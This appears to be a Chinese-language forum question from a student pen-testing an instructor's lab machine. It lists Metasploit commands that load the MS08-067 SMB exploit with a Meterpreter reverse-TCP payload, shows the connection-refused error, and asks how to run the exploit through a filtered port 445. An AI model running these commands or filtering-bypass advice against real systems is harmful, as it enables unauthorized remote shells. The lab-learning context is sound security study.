我正在对讲师在实验室设置的机器进行一些测试。NMAP 显示要过滤的端口 445 并且 Nessus 确认该计算机上存在 ms08_067 漏洞。
我尝试以正常方式运行 Metasploit:
use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit
它告诉我:
[-] Exploit failed [unreachable]: Rex::ConnectionRefused 连接被远程主机拒绝 (192.168.2.2:445)
我猜这个漏洞利用失败是因为端口 445 被过滤了。让我感到困惑的是,Nessus 显然可以检查该漏洞是否存在。由于 Nessus 可以通过过滤端口执行此操作,有没有办法可以通过过滤端口启动漏洞利用?是否有任何需要安排的 Metasploit 设置?